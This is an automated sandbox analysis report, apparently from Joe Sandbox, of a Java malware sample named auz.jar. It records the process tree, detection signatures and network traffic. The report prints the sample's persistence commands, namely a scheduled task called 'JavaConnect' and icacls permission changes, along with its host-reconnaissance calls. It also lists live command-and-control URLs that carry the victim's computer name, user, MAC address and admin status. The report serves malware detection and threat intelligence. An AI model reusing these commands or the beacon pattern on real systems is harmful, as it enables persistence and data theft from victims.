Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
auz.jar

Overview

General Information

Sample Name:auz.jar
Analysis ID:841597
MD5:2792f3aa4b0f15c488c32bcd1e03afd8
SHA1:b49223709c7a83125912a2474e79b446c622b232
SHA256:5487a1b50399574ff09d2f8bb6fa87d0b194c840e8aeda26196b612a6a3fcb3a
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Uses cmd line tools excessively to alter registry or file data
Exploit detected, runtime environment starts unknown processes
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Launches a Java Jar file from a suspicious file location
Enables debug privileges

Classification

  • System is w10x64
  • cmd.exe (PID: 1240 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\auz.jar"" >> C:\cmdlinestart.log 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • java.exe (PID: 6732 cmdline: "C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\auz.jar" MD5: 28733BA8C383E865338638DF5196E6FE)
      • icacls.exe (PID: 4540 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 1792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • tasklist.exe (PID: 3216 cmdline: tasklist MD5: 6B7D2FC3FB98B10A5F77B23DEF745F6F)
        • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6916 cmdline: cmd /c schtasks /create /tn "JavaConnect" /tr "\"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe\" -jar \"C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log\"" /sc minute /mo 60 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 7056 cmdline: schtasks /create /tn "JavaConnect" /tr "\"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe\" -jar \"C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log\"" /sc minute /mo 60 MD5: 15FF7D8324231381BAD48A052F85DF04)
      • reg.exe (PID: 376 cmdline: reg query "HKU\S-1-5-19" MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • javaw.exe (PID: 3524 cmdline: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log MD5: 4BFEB2F64685DA09DEBB95FB981D4F65)
    • tasklist.exe (PID: 1604 cmdline: tasklist MD5: 6B7D2FC3FB98B10A5F77B23DEF745F6F)
      • conhost.exe (PID: 5084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5196 cmdline: cmd /c schtasks /create /tn "JavaConnect" /tr "\"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe\" -jar \"C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log\"" /sc minute /mo 60 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 6948 cmdline: schtasks /create /tn "JavaConnect" /tr "\"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe\" -jar \"C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log\"" /sc minute /mo 60 MD5: 15FF7D8324231381BAD48A052F85DF04)
    • reg.exe (PID: 7060 cmdline: reg query "HKU\S-1-5-19" MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: auz.jarVirustotal: Detection: 15%Perma Link
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
Source: unknownHTTPS traffic detected: 46.16.95.61:443 -> 192.168.2.4:49698 version: TLS 1.2
Source: unknownHTTPS traffic detected: 46.16.95.61:443 -> 192.168.2.4:49699 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\tasklist.exe
Source: Joe Sandbox ViewJA3 fingerprint: d2935c58fe676744fecc8614ee5356c7
Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: java.exe, 00000002.00000002.568546871.000000000A5C5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.567221416.000000000A797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
Source: java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl
Source: java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl
Source: java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.0000000005638000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: java.exe, 00000002.00000002.573889478.0000000015D0D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.317230891.0000000015D0E000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.316669999.0000000015CEA000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.315966186.0000000015CCD000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.395155985.0000000015D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.u
Source: java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: java.exe, 00000002.00000002.568546871.000000000A5D5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.567221416.000000000A7A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://java.oracle.com/
Source: java.exe, java.exe, 00000002.00000002.573635192.0000000015C32000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000002.568546871.000000000A77B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000003.396032507.000000001566E000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000002.573350505.00000000156B1000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.315886300.00000000156D5000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.396582802.00000000156AA000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.315708884.0000000015652000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.315477724.0000000015607000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, javaw.exe, 0000000A.00000003.393245827.0000000015874000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.570339410.000000001587B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.567221416.000000000A843000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000003.393054543.000000001585C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://null.oracle.com/
Source: javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com
Source: java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com0
Source: javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
Source: java.exe, 00000002.00000002.568546871.000000000A8DB000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
Source: java.exe, 00000002.00000002.565299658.0000000005483000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/3
Source: javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl
Source: java.exe, 00000002.00000002.568546871.000000000A8DB000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
Source: java.exe, 00000002.00000002.565299658.0000000005483000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crls
Source: javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl
Source: java.exe, 00000002.00000002.568546871.000000000A8DB000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl
Source: java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org
Source: java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
Source: javaw.exe, 0000000A.00000002.565143131.000000000548B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.000000000549D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.geoplugin.net/json.gp
Source: javaw.exe, 0000000A.00000002.565143131.000000000548B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.000000000549D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.geoplugin.net/json.gp?
Source: javaw.exe, 0000000A.00000002.565143131.000000000549D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.geoplugin.net/json.gp?ip=
Source: javaw.exe, 0000000A.00000002.565143131.000000000549D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.geoplugin.net/json.gp?ip=)
Source: java.exe, 00000002.00000002.568546871.000000000A8DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm
Source: java.exe, 00000002.00000002.568546871.000000000A8DB000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
Source: java.exe, 00000002.00000002.568546871.000000000A8DB000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
Source: java.exe, 00000002.00000002.565299658.0000000005218000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.0000000005433000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000054B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adrenalinecyber.com
Source: java.exe, 00000002.00000002.565299658.0000000005218000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.568546871.000000000A928000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000054B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adrenalinecyber.com/login/
Source: java.exe, 00000002.00000002.565299658.0000000005218000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000054B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adrenalinecyber.com/login//api.php
Source: java.exe, 00000002.00000002.565299658.0000000005218000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000054B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adrenalinecyber.com/login//api.php?
Source: javaw.exe, 0000000A.00000002.565143131.0000000005433000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adrenalinecyber.com/login//api.php?action=getIpAddress
Source: java.exe, 00000002.00000002.565299658.0000000005218000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000054B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adrenalinecyber.com/login//api.php?action=get_anytask&ip=&
Source: javaw.exe, 0000000A.00000002.565143131.00000000054B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adrenalinecyber.com/login//api.php?action=get_anytask&ip=&computer_name=305090&user_name=jon
Source: javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com
Source: java.exe, 00000002.00000002.568546871.000000000A8DB000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.568546871.000000000A81A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000056CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: java.exe, 00000002.00000002.565299658.00000000052A7000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000054CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paradisodomenico.it
Source: java.exe, 00000002.00000002.568546871.000000000A928000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.565299658.00000000052A7000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000054CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paradisodomenico.it/wp-content/
Source: java.exe, 00000002.00000002.565299658.00000000052A7000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000054CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paradisodomenico.it/wp-content//api.php
Source: java.exe, 00000002.00000002.565299658.00000000052A7000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000054CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paradisodomenico.it/wp-content//api.php?
Source: java.exe, 00000002.00000002.565299658.00000000052A7000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000A.00000002.565143131.00000000054CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paradisodomenico.it/wp-content//api.php?action=get_anytask&ip=&
Source: javaw.exe, 0000000A.00000002.565143131.00000000054CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paradisodomenico.it/wp-content//api.php?action=get_anytask&ip=&computer_name=305090&user
Source: unknownDNS traffic detected: queries for: adrenalinecyber.com
Source: global trafficHTTP traffic detected: GET /wp-content//api.php?action=get_anytask&ip=&computer_name=305090&user_name=user&mac=EC-F4-BB-EA-15-88&country_code=CH&is_admin=admin&Def=OFF&hwid=bcfca15a1fe879c681f1459b1b147c6e HTTP/1.1User-Agent: Java/1.8.0_211Host: www.paradisodomenico.itAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /wp-content//api.php?action=get_anytask&ip=&computer_name=305090&user_name=user&mac=EC-F4-BB-EA-15-88&country_code=CH&is_admin=normal&Def=ON&hwid=bcfca15a1fe879c681f1459b1b147c6e HTTP/1.1User-Agent: Java/1.8.0_211Host: www.paradisodomenico.itAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /json.gp?ip= HTTP/1.1User-Agent: Java/1.8.0_211Host: www.geoplugin.netAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /json.gp?ip= HTTP/1.1User-Agent: Java/1.8.0_211Host: www.geoplugin.netAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /json.gp?ip= HTTP/1.1User-Agent: Java/1.8.0_211Host: www.geoplugin.netAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /json.gp?ip= HTTP/1.1User-Agent: Java/1.8.0_211Host: www.geoplugin.netAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: keep-alive
Source: unknownHTTPS traffic detected: 46.16.95.61:443 -> 192.168.2.4:49698 version: TLS 1.2
Source: unknownHTTPS traffic detected: 46.16.95.61:443 -> 192.168.2.4:49699 version: TLS 1.2
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19"
Source: auz.jarVirustotal: Detection: 15%
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\auz.jar"" >> C:\cmdlinestart.log 2>&1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\auz.jar"
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /create /tn "JavaConnect" /tr "\"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe\" -jar \"C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log\"" /sc minute /mo 60
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "JavaConnect" /tr "\"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe\" -jar \"C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log\"" /sc minute /mo 60
Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19"
Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /create /tn "JavaConnect" /tr "\"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe\" -jar \"C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log\"" /sc minute /mo 60
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "JavaConnect" /tr "\"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe\" -jar \"C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log\"" /sc minute /mo 60
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19"
Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\auz.jar" Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)MJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /create /tn "JavaConnect" /tr "\"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe\" -jar \"C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log\"" /sc minute /mo 60Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "JavaConnect" /tr "\"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe\" -jar \"C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log\"" /sc minute /mo 60Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /create /tn "JavaConnect" /tr "\"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe\" -jar \"C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log\"" /sc minute /mo 60Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "JavaConnect" /tr "\"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe\" -jar \"C:\Users\user\AppData\Roaming\bcfca1\bcfca15a1fe879c681f1459b1b147c6e.log\"" /sc minute /mo 60Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
